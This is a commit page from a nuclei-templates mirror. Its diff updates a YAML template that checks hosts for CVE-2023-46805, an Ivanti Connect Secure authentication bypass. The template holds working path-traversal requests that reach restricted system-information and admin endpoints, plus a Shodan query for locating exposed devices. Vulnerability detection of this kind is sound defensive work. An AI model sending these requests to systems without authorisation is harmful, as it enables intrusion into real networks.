daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

feat: added more path to detect CVE-2023-46805

patch-1
Muhammad Daffa 2024-02-01 08:32:28 +07:00 committed by GitHub
parent d100d82527
commit a7d487708a
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 26 additions and 23 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

49
http/cves/2023/CVE-2023-46805.yaml
View File

@ -2,7 +2,7 @@ id: CVE-2023-46805
info: info:
name: Ivanti ICS - Authentication Bypass name: Ivanti ICS - Authentication Bypass
author: DhiyaneshDK author: DhiyaneshDK,daffainfo,geeknik
severity: high severity: high
description: An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks. description: An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.
reference: reference:
@ -15,33 +15,36 @@ info:
cwe-id: CWE-287 cwe-id: CWE-287
cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:* cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:*
metadata: metadata:
max-request: 1
vendor: ivanti vendor: ivanti
product: "connect_secure" product: connect_secure
shodan-query: "html:\"welcome.cgi?p=logo\"" shodan-query: html:"welcome.cgi?p=logo"
tags: cve,cve2023,kev,auth-bypass,ivanti tags: cve,cve2023,kev,auth-bypass,ivanti
http: http:
- method: GET - raw:
path: - |
- "{{BaseURL}}/api/v1/totp/user-backup-code/../../system/system-information" GET /api/v1/totp/user-backup-code/../../system/system-information HTTP/1.1
Host: {{Hostname}}
matchers-condition: and - |
GET /api/v1/cav/client/status/../../admin/options HTTP/1.1
Host: {{Hostname}}
matchers-condition: or
matchers: matchers:
- type: word - type: dsl
part: body dsl:
words: - 'status_code_1 == 200'
- '"build":' - 'contains(body_1, "build")'
- '"system-information":' - 'contains(body_1, "system-information")'
- '"software-inventory":' - 'contains(body_1, "software-inventory")'
- 'contains(all_headers_1, "application/json")'
condition: and condition: and
- type: word - type: dsl
part: header dsl:
words: - 'status_code_2 == 200'
- 'application/json' - 'contains(body_2, "poll_interval")'
- 'contains(body_2, "block_message")'
- type: status - 'contains(all_headers_2, "application/json")'
status: condition: and
- 200
# digest: 490a0046304402200c2940ac9185c5eb2e95f351128a93769e4ec4fe672f158c99b3b4dc4b84b3a1022029f5e9c610b5d8b080a94548f97227972aee323b91cec07e4d3795f37cdb64ac:922c64590222798bb761d5b6d8e72950